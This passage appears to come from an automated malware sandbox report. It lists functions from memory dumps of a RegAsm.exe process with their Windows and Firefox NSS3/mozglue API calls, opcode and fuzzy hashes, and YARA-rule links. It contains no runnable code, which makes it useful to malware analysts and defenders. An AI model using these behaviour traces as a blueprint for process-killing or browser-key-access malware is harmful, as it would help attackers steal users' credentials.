                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$AllocLocalProcessTimewsprintf
                                                                                • String ID: NeB
                                                                                • API String ID: 1243822799-85837446
                                                                                • Opcode ID: d4aeb748054ef85310db5bbdc432010fa75f15f3d3fe455483fb2aece36d3219
                                                                                • Instruction ID: 6a3b0a9d5a99a23c7b872276523f8019a9300f8a2912452fb95d56cdfabf1196
                                                                                • Opcode Fuzzy Hash: d4aeb748054ef85310db5bbdc432010fa75f15f3d3fe455483fb2aece36d3219
                                                                                • Instruction Fuzzy Hash: F7F0FEAA900124BBDB50ABD99D09ABF76FDEF0DB02F001452FB41E1091E6788950D7B4
                                                                                Function 6C81C410 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryW.KERNEL32(ntdll.dll,?,6C81C0E9), ref: 6C81C418
                                                                                • GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6C81C437
                                                                                • FreeLibrary.KERNEL32(?,6C81C0E9), ref: 6C81C44C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650238110.000000006C7B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7B0000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650211449.000000006C7B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650409954.000000006C82D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650456604.000000006C83E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650533178.000000006C842000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c7b0000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Library$AddressFreeLoadProc
                                                                                • String ID: NtQueryVirtualMemory$ntdll.dll
                                                                                • API String ID: 145871493-2623246514
                                                                                • Opcode ID: 4b482d8cb22fa1b0bf64e1efcbf9cec707338ea17b131f3f846d807cab6cd4a7
                                                                                • Instruction ID: dbb0bc33428cd5441e291453c23c86f056e3b969863396cad9b416b88e26bd02
                                                                                • Opcode Fuzzy Hash: 4b482d8cb22fa1b0bf64e1efcbf9cec707338ea17b131f3f846d807cab6cd4a7
                                                                                • Instruction Fuzzy Hash: 50E09AB06097219BDF347BF58A08B127BF8A75620CF006D75AE0D91651DB79D004DAD4
                                                                                Function 6C876D2E Relevance: 7.6, APIs: 5, Instructions: 148COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 6C863C40: _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C863C66
                                                                                  • Part of subcall function 6C863C40: _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(000000FD,?), ref: 6C863D04
                                                                                • memcpy.VCRUNTIME140(?,?,?), ref: 6C876DC0
                                                                                • memcpy.VCRUNTIME140(?,?,?), ref: 6C876DE5
                                                                                  • Part of subcall function 6C878010: _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C87807D
                                                                                  • Part of subcall function 6C878010: _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C8780D1
                                                                                  • Part of subcall function 6C878010: _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C87810E
                                                                                  • Part of subcall function 6C878010: _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C878140
                                                                                • memcpy.VCRUNTIME140(00000004,00000004,00000000), ref: 6C876E7E
                                                                                • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C876E96
                                                                                • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C876EC2
                                                                                  • Part of subcall function 6C877D70: _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C877E27
                                                                                  • Part of subcall function 6C877D70: _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C877E67
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: _byteswap_ulong$memcpy$_byteswap_ushort
                                                                                • String ID:
                                                                                • API String ID: 3070372028-0
                                                                                • Opcode ID: 848c820c84e3ba32651aa9a9d26f40a2b88f3f9ef7b005cdd258c69f0d4c2721
                                                                                • Instruction ID: 70f64743e09082cb633e290437de1ee4528144ddf5f3b9bf5f070a0c2cc5ff36
                                                                                • Opcode Fuzzy Hash: 848c820c84e3ba32651aa9a9d26f40a2b88f3f9ef7b005cdd258c69f0d4c2721
                                                                                • Instruction Fuzzy Hash: 895190719083519FC735CF25C550B6ABBE5FF88318F048A6DE89987B41E730E918CB92
                                                                                Function 6C8CEDE0 Relevance: 7.6, APIs: 5, Instructions: 97COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • TlsGetValue.KERNEL32 ref: 6C8CEDFD
                                                                                • calloc.MOZGLUE(00000001,00000000), ref: 6C8CEE64
                                                                                • PR_SetError.NSS3(FFFFE8AC,00000000), ref: 6C8CEECC
                                                                                • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C8CEEEB
                                                                                • free.MOZGLUE(?), ref: 6C8CEEF6
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorValuecallocfreememcpy
                                                                                • String ID:
                                                                                • API String ID: 3833505462-0
                                                                                • Opcode ID: 49333879f1d9318b98d7defa88489054640996ed8c98e0d0b86bd8b86b34b6a2
                                                                                • Instruction ID: 3eba47f86f912e979fb82f20b9da14238428c5e5b0632527e26885b3e2e10bd1
                                                                                • Opcode Fuzzy Hash: 49333879f1d9318b98d7defa88489054640996ed8c98e0d0b86bd8b86b34b6a2
                                                                                • Instruction Fuzzy Hash: 913125B17003159BE7309F2CCD46B667BB4FB46388F144A28E85AC7A51D735E814CBE2
                                                                                Function 00411056 Relevance: 7.6, APIs: 5, Instructions: 88COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 0041105B
                                                                                • memset.MSVCRT ref: 0041107D
                                                                                  • Part of subcall function 00410CAC: GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,004110AA,00000000,?,00000000,?), ref: 00410CB7
                                                                                  • Part of subcall function 00410CAC: HeapAlloc.KERNEL32(00000000,?,004110AA,00000000,?,00000000,?), ref: 00410CBE
                                                                                  • Part of subcall function 00410CAC: wsprintfW.USER32 ref: 00410CCF
                                                                                • OpenProcess.KERNEL32(00001001,00000000,?,?,?,?,00000000,?), ref: 00411104
                                                                                • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000000,?), ref: 00411112
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?), ref: 00411119
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$Heap$AllocCloseH_prologHandleOpenTerminatememsetwsprintf
                                                                                • String ID:
                                                                                • API String ID: 1628159694-0
                                                                                • Opcode ID: eda3bebae7e381b0fd502df677cdf661e45432fec2b6010a7c0ff375d6191211
                                                                                • Instruction ID: 36bd9fcb495497175832ad1b73d2d45116fcd412ea3aab7de57d6fc10e614e88
                                                                                • Opcode Fuzzy Hash: eda3bebae7e381b0fd502df677cdf661e45432fec2b6010a7c0ff375d6191211
                                                                                • Instruction Fuzzy Hash: 31314C72D01128ABCB21EB90DD85DEFBB79FF09350F10012AF645E2190DB345A85CBE4
                                                                                Function 6C7BB4C0 Relevance: 7.6, APIs: 5, Instructions: 84COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 6C7BB532
                                                                                • moz_xmalloc.MOZGLUE(?), ref: 6C7BB55B
                                                                                • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C7BB56B
                                                                                • wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6C7BB57E
                                                                                • free.MOZGLUE(00000000), ref: 6C7BB58F
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650238110.000000006C7B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7B0000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650211449.000000006C7B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650409954.000000006C82D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650456604.000000006C83E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650533178.000000006C842000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c7b0000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModulefreememsetmoz_xmallocwcsncpy_s
                                                                                • String ID:
                                                                                • API String ID: 4244350000-0
                                                                                • Opcode ID: 341d7891658c2b6387ab97dd1da03410c6357a9a6bda8b3a722cbac5646c20ab
                                                                                • Instruction ID: e1c4d6a4bdae65f5386ea32fe990287daa4dd51a8f94409df5c9efddd59322eb
                                                                                • Opcode Fuzzy Hash: 341d7891658c2b6387ab97dd1da03410c6357a9a6bda8b3a722cbac5646c20ab
                                                                                • Instruction Fuzzy Hash: 5621F8716002059BDB109F68CE84B6ABBB9FF41308F244139ED18DB341E775E911C7A1
                                                                                Function 6C8DAD90 Relevance: 7.6, APIs: 5, Instructions: 72memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PORT_ArenaMark_Util.NSS3(00000000,?,6C8D3FFF,00000000,?,?,?,?,?,6C8D1A1C,00000000,00000000), ref: 6C8DADA7
                                                                                  • Part of subcall function 6C9314C0: TlsGetValue.KERNEL32 ref: 6C9314E0
                                                                                  • Part of subcall function 6C9314C0: EnterCriticalSection.KERNEL32 ref: 6C9314F5
                                                                                  • Part of subcall function 6C9314C0: PR_Unlock.NSS3 ref: 6C93150D
                                                                                • PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6C8D3FFF,00000000,?,?,?,?,?,6C8D1A1C,00000000,00000000), ref: 6C8DADB4
                                                                                  • Part of subcall function 6C9310C0: TlsGetValue.KERNEL32(?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C9310F3
                                                                                  • Part of subcall function 6C9310C0: EnterCriticalSection.KERNEL32(?,?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C93110C
                                                                                  • Part of subcall function 6C9310C0: PL_ArenaAllocate.NSS3(?,?,?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C931141
                                                                                  • Part of subcall function 6C9310C0: PR_Unlock.NSS3(?,?,?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C931182
                                                                                  • Part of subcall function 6C9310C0: TlsGetValue.KERNEL32(?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C93119C
                                                                                • SECITEM_CopyItem_Util.NSS3(00000000,?,6C8D3FFF,?,?,?,?,6C8D3FFF,00000000,?,?,?,?,?,6C8D1A1C,00000000), ref: 6C8DADD5
                                                                                  • Part of subcall function 6C92FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C928D2D,?,00000000,?), ref: 6C92FB85
                                                                                  • Part of subcall function 6C92FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C92FBB1
                                                                                • SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C9F94B0,?,?,?,?,?,?,?,?,6C8D3FFF,00000000,?), ref: 6C8DADEC
                                                                                  • Part of subcall function 6C92B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CA018D0,?), ref: 6C92B095
                                                                                • PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C8D3FFF), ref: 6C8DAE3C
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
                                                                                • String ID:
                                                                                • API String ID: 2372449006-0
                                                                                • Opcode ID: 51b250ac92364d17843a8e28da0ab8267a7b209ab38945af1c5752dd0931d8cc
                                                                                • Instruction ID: 3381c133e61911be737b5c3b8c2fe6e6580ad9fa85e13098ae16a5f5d090e738
                                                                                • Opcode Fuzzy Hash: 51b250ac92364d17843a8e28da0ab8267a7b209ab38945af1c5752dd0931d8cc
                                                                                • Instruction Fuzzy Hash: E4115931E003156BE7209B249C40BFF73B89FB124DF144928EC5996641FB20F558C3A2
                                                                                Function 6C8F8E80 Relevance: 7.6, APIs: 5, Instructions: 71COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PK11_GetInternalKeySlot.NSS3(?,?,?,6C912E62,?,?,?,?,?,?,?,00000000,?,?,?,6C8E4F1C), ref: 6C8F8EA2
                                                                                  • Part of subcall function 6C91F820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C91F854
                                                                                  • Part of subcall function 6C91F820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C91F868
                                                                                  • Part of subcall function 6C91F820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C91F882
                                                                                  • Part of subcall function 6C91F820: free.MOZGLUE(04C483FF,?,?), ref: 6C91F889
                                                                                  • Part of subcall function 6C91F820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C91F8A4
                                                                                  • Part of subcall function 6C91F820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C91F8AB
                                                                                  • Part of subcall function 6C91F820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C91F8C9
                                                                                  • Part of subcall function 6C91F820: free.MOZGLUE(280F10EC,?,?), ref: 6C91F8D0
                                                                                • PK11_IsLoggedIn.NSS3(?,?,?,6C912E62,?,?,?,?,?,?,?,00000000,?,?,?,6C8E4F1C), ref: 6C8F8EC3
                                                                                • TlsGetValue.KERNEL32(?,?,?,6C912E62,?,?,?,?,?,?,?,00000000,?,?,?,6C8E4F1C), ref: 6C8F8EDC
                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,6C912E62,?,?,?,?,?,?,?,00000000,?,?), ref: 6C8F8EF1
                                                                                • PR_Unlock.NSS3 ref: 6C8F8F20
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: free$CriticalSection$Delete$K11_$EnterInternalLoggedSlotUnlockValue
                                                                                • String ID:
                                                                                • API String ID: 1978757487-0
                                                                                • Opcode ID: d1094830298e0e24dffb96fe8c68c0174794d3962b55709a7eda0b172e5fe631
                                                                                • Instruction ID: 132cfa04d403eca74bfc223157054b7023f98ad7b19a917e79d9dfafacdeb0ef
                                                                                • Opcode Fuzzy Hash: d1094830298e0e24dffb96fe8c68c0174794d3962b55709a7eda0b172e5fe631
                                                                                • Instruction Fuzzy Hash: 6421A370A097059FDB10AF29D684199BBF0FF49358F01896EECA897B40D734E855CBD2
                                                                                Function 6C8FCD80 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 6C911E10: TlsGetValue.KERNEL32 ref: 6C911E36
                                                                                  • Part of subcall function 6C911E10: EnterCriticalSection.KERNEL32(?,?,?,6C8EB1EE,2404110F,?,?), ref: 6C911E4B
                                                                                  • Part of subcall function 6C911E10: PR_Unlock.NSS3 ref: 6C911E76
                                                                                • free.MOZGLUE(?,6C8FD079,00000000,00000001), ref: 6C8FCDA5
                                                                                • PK11_FreeSymKey.NSS3(?,6C8FD079,00000000,00000001), ref: 6C8FCDB6
                                                                                • SECITEM_ZfreeItem_Util.NSS3(?,00000001,6C8FD079,00000000,00000001), ref: 6C8FCDCF
                                                                                • DeleteCriticalSection.KERNEL32(?,6C8FD079,00000000,00000001), ref: 6C8FCDE2
                                                                                • free.MOZGLUE(?), ref: 6C8FCDE9
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
                                                                                • String ID:
                                                                                • API String ID: 1720798025-0
                                                                                • Opcode ID: e9dee651724f26eea97ef0ff1a726fae14bc8892ede45e16bddc27c6ba77b5b9
                                                                                • Instruction ID: d70fead247b511829b4c19fe50eda2ad07a37ab980ae32d67ce1f59aa186bdbb
                                                                                • Opcode Fuzzy Hash: e9dee651724f26eea97ef0ff1a726fae14bc8892ede45e16bddc27c6ba77b5b9
                                                                                • Instruction Fuzzy Hash: DD1106B2B00216ABEF20BE64ED4599A772DFF1429D7044521E92983E02E735E526C7E0
                                                                                Function 6C962CC0 Relevance: 7.6, APIs: 5, Instructions: 55COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 6C965B40: PR_GetIdentitiesLayer.NSS3 ref: 6C965B56
                                                                                • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C962CEC
                                                                                  • Part of subcall function 6C97C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C97C2BF
                                                                                • PR_EnterMonitor.NSS3(?), ref: 6C962D02
                                                                                • PR_EnterMonitor.NSS3(?), ref: 6C962D1F
                                                                                • PR_ExitMonitor.NSS3(?), ref: 6C962D42
                                                                                • PR_ExitMonitor.NSS3(?), ref: 6C962D5B
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                                                • String ID:
                                                                                • API String ID: 1593528140-0
                                                                                • Opcode ID: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
                                                                                • Instruction ID: d0b17f297717f9037ebf316d7175e4a5de1100ab6f7eae09d154b567bf3493e7
                                                                                • Opcode Fuzzy Hash: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
                                                                                • Instruction Fuzzy Hash: 8101A1B1A00A009FF7309F2AFC41BD7B7A5EF65318F044535E85D86B60E632E8158692
                                                                                Function 6C962D70 Relevance: 7.6, APIs: 5, Instructions: 55COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 6C965B40: PR_GetIdentitiesLayer.NSS3 ref: 6C965B56
                                                                                • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C962D9C
                                                                                  • Part of subcall function 6C97C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C97C2BF
                                                                                • PR_EnterMonitor.NSS3(?), ref: 6C962DB2
                                                                                • PR_EnterMonitor.NSS3(?), ref: 6C962DCF
                                                                                • PR_ExitMonitor.NSS3(?), ref: 6C962DF2
                                                                                • PR_ExitMonitor.NSS3(?), ref: 6C962E0B
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                                                • String ID:
                                                                                • API String ID: 1593528140-0
                                                                                • Opcode ID: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
                                                                                • Instruction ID: 9368be2eb6e4bd340a2208545ad8a3c55ba1d9ab78ebbad8f359128d84463bf9
                                                                                • Opcode Fuzzy Hash: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
                                                                                • Instruction Fuzzy Hash: 5501A1B1A00A009FFB319F2AFC05BD7B7A5EB65318F040435E85D86F50D632E82586A2
                                                                                Function 6C8FAE30 Relevance: 7.6, APIs: 5, Instructions: 54COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 6C8E3090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C8FAE42), ref: 6C8E30AA
                                                                                  • Part of subcall function 6C8E3090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C8E30C7
                                                                                  • Part of subcall function 6C8E3090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C8E30E5
                                                                                  • Part of subcall function 6C8E3090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C8E3116
                                                                                  • Part of subcall function 6C8E3090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C8E312B
                                                                                  • Part of subcall function 6C8E3090: PK11_DestroyObject.NSS3(?,?), ref: 6C8E3154
                                                                                  • Part of subcall function 6C8E3090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8E317E
                                                                                • SECKEY_DestroyPublicKey.NSS3(00000000,?,00000000,?,6C8D99FF,?,?,?,?,?,?,?,?,?,6C8D2D6B,?), ref: 6C8FAE67
